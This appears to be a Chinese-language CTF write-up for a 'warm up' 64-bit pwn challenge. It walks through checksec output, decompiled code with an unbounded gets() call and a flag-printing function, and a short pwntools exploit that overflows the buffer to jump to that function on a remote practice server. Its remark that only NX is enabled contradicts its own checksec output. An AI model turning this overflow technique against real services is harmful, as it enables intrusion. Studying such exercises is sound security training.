warm up

Posted on | In

0x01 寻找漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
xfgg@ubuntu:~/Downloads$ checksec warmup

[*] '/home/xfgg/Downloads/warmup'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments
只开启了nx保护

ida分析

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  char s; // [rsp+0h] [rbp-80h]
  char v5; // [rsp+40h] [rbp-40h]

  write(1, "-Warm Up-\n", 0xAuLL);
  write(1, "WOW:", 4uLL);
  sprintf(&s, "%p\n", sub_40060D);
  write(1, &s, 9uLL);
  write(1, ">", 1uLL);
  return gets(&v5, ">");
}

gets(&v5, ">");  栈溢出漏洞利用

int sub_40060D()
{
  return system("cat flag.txt");
}

system函数

-0000000000000040 var_40          db ?
-000000000000003F                 db ? ; undefined
-000000000000003E                 db ? ; undefined
-000000000000003D                 db ? ; undefined
-000000000000003C                 db ? ; undefined
-000000000000003B                 db ? ; undefined
-000000000000003A                 db ? ; undefined
-0000000000000039                 db ? ; undefined
-0000000000000038                 db ? ; undefined
-0000000000000037                 db ? ; undefined
-0000000000000036                 db ? ; undefined
-0000000000000035                 db ? ; undefined
-0000000000000034                 db ? ; undefined

+0000000000000000  s              db 8 dup(?)
+0000000000000008  r              db 8 dup(?)

覆盖v5只需要0x48个字节就可以了

0x02 思路分析

1
利用栈溢出覆盖gets中的v5,写入system函数的地址即可

0x03 攻击

1
非常简单的64位栈溢出

exp

1
2
3
4
5
6
7
8
9
from pwn import *
p = remote('111.198.29.45',41315)
sys_addr = 0x000000000040060D

payload = 'a'*0x40+'a'*8+p64(sys_addr)

p.sendline(payload)

p.interactive()
0%